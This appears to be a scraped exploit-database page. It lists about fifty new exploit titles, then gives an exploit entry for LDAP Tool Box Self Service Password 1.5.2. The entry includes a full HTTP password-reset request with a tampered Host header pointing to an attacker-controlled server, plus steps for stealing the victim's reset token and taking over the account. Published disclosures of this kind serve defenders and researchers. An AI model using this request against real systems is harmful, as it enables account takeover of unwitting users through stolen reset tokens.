
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
60 lines
No EOL
2 KiB
Text
60 lines
No EOL
2 KiB
Text
# Exploit Title: LDAP Tool Box Self Service Password v1.5.2 - Account takeover
|
|
# Date: 02/17/2023
|
|
# Exploit Author: Tahar BENNACEF (aka tar.gz)
|
|
# Software Link: https://github.com/ltb-project/self-service-password
|
|
# Version: 1.5.2
|
|
# Tested on: Ubuntu
|
|
|
|
Self Service Password is a PHP application that allows users to change
|
|
their password in an LDAP directory.
|
|
It is very useful to get back an account with waiting an action from an
|
|
administration especially in Active Directory environment
|
|
|
|
The password reset feature is prone to an HTTP Host header vulnerability
|
|
allowing an attacker to tamper the password-reset mail sent to his victim
|
|
allowing him to potentially steal his victim's valid reset token. The
|
|
attacker can then use it to perform account takeover
|
|
|
|
|
|
*Step to reproduce*
|
|
|
|
1. Request a password reset request targeting your victim and setting in
|
|
the request HTTP Host header the value of a server under your control
|
|
|
|
POST /?action=sendtoken HTTP/1.1
|
|
Host: *111.111.111.111*
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
|
|
Firefox/102.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 16
|
|
Origin: https://portal-lab.ngp.infra
|
|
Referer: https://portal-lab.ngp.infra/?action=sendtoken
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
Te: trailers
|
|
Connection: close
|
|
|
|
login=test.reset
|
|
|
|
|
|
As the vulnerable web application's relying on the Host header of the
|
|
password-reset request to craft the password-reset mail. The victim
|
|
receive a mail with a tampered link
|
|
[image: image.png]
|
|
|
|
2. Start a webserver and wait for the victim to click on the link
|
|
|
|
If the victim click on this tampered link, he will sent his password reset
|
|
token to the server set in the password-reset request's HTTP Host header
|
|
[image: image.png]
|
|
|
|
3. Use the stolen token to reset victim's account password
|
|
|
|
|
|
Best regards |